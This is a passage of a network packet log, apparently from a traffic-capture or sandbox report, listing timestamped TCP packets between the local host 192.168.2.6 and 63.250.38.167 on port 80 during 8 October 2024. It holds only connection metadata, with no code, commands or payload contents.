Oct 8, 2024 11:30:27.822186947 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.822199106 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.822208881 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.822215080 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.822220087 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.822231054 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.822240114 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.822249889 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.822259903 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.822259903 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.822261095 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.822273016 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.822280884 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.822289944 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.822299004 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.822299004 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.822299957 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.822313070 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.822323084 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.822340965 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.822350025 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.822354078 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.822354078 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.822360039 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.822372913 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.822382927 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.822392941 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.822402000 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.822407961 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.822407961 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.822415113 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.822424889 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.822436094 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.822437048 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.822437048 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.822487116 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.822487116 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.823656082 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.823673964 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.823682070 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.823761940 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.823771954 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.823780060 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.823791027 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.823802948 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.823801994 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.823805094 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.823813915 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.823846102 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.823847055 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.823864937 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.823875904 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.823885918 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.823887110 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.823887110 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.823895931 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.823911905 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.823924065 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.823928118 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.823935032 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.823964119 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.823965073 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.823968887 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.823981047 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.823991060 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.824001074 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.824009895 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.824019909 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.824047089 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.824047089 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.824073076 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.824084997 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.824122906 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.824135065 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.824143887 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.824182987 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:31.921256065 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:34.985281944 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:35.958940029 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:35.959008932 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:35.959316969 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:35.965934038 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:36.603615046 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:36.603635073 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:36.603651047 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:36.603665113 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:36.603679895 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:36.603694916 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:36.603708982 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:36.603724003 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:36.603739023 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:36.603754997 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:36.603806973 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:36.603842020 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:36.608711958 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:36.608779907 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:36.608844042 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.059021950 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.059077024 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.059093952 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.059111118 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.059127092 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.059142113 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.059158087 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.059159994 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.059179068 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.059195995 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.059211969 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.059226036 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.059240103 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.059247971 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.059247971 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.059247971 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.059254885 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.059264898 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.059267998 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.059273005 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.059282064 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.059295893 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.059304953 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.059319973 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.059336901 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.059340000 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.059340000 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.059353113 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.059369087 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.059391022 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.059391022 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.059720993 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.060085058 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.481754065 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.481849909 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.482286930 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.482364893 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.482377052 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.482414961 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.482490063 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.482506990 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.482517958 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.482527971 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.482537985 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.482547998 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.482558966 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.482563972 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.482563972 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.482563972 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.482575893 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.482587099 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.482625008 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.482640982 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.483565092 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.483601093 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.483614922 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.483675957 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.483685970 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.483755112 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.483755112 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.483755112 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.484424114 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.484502077 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.484513998 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.484524965 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.484535933 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.485219002 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.485229969 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.485240936 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.485260010 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.485272884 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.485294104 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.485294104 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.485294104 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.485294104 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.485344887 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.486144066 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.486155033 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.486174107 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.486183882 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.486196995 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.486212969 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.486269951 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.487076998 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.487138033 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.487149000 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.487159967 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.487170935 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.487181902 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.487267017 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.487267017 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.487983942 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.488029003 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.488039017 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.488085032 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.488089085 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.488101006 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.488157988 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.488928080 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.489202023 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.489212990 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.489223003 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.489233017 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.489243984 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.489270926 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.489270926 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.489270926 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.490123034 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.490175009 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.490185022 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.490221977 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.490232944 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.490267992 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.490267992 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.490267992 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.491122961 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.491173029 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.491206884 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.491230011 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.491569996 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.491646051 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.491656065 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.491664886 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.491681099 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.491681099 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.491691113 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.492604971 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.492615938 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.492625952 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.493096113 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.493102074 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.493102074 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.493113041 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.493124962 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.493134975 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.493144035 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.493148088 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.493166924 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.494046926 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.494124889 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.494172096 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.494172096 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.494360924 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.494401932 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.494411945 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.494956017 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.495038986 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.495047092 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.495047092 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.495049953 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.495062113 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.495073080 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.495109081 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.495109081 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.495933056 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.495944023 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.495954037 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.495971918 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.495997906 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.496010065 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.496042967 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.496824026 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.496877909 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.497044086 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.497054100 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.497064114 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.497072935 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.497092962 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.497102976 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.497113943 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.497116089 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.497116089 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.497124910 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.497137070 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.497147083 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.497157097 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.497167110 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.497188091 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.497188091 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.497188091 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.497230053 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.497751951 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.497762918 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.497773886 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.497785091 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.497833014 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.497833014 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.497982025 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.497992039 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.498003006 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.498137951 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.498147964 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.498157978 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.498167992 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.498178959 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.498188019 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.498193979 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.498193979 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.498193979 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.498199940 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.498212099 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.498223066 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.498233080 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.498244047 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.498267889 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.498267889 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.498267889 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.498317957 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.498871088 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.498918056 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.498929024 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.498976946 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.498987913 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.498997927 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.499042034 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.499042034 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.499042034 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.499310017 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.499320984 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.499340057 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.499351978 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.499362946 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.499402046 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.499402046 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.499591112 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.499697924 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.499708891 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.499721050 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.499727011 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.499732018 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.499747992 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.499748945 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.499761105 CEST	80	49835	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:37.499785900 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.499799967 CEST	49835	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:37.500099897 CEST	80	49835	63.250.38.167	192.168.2.6
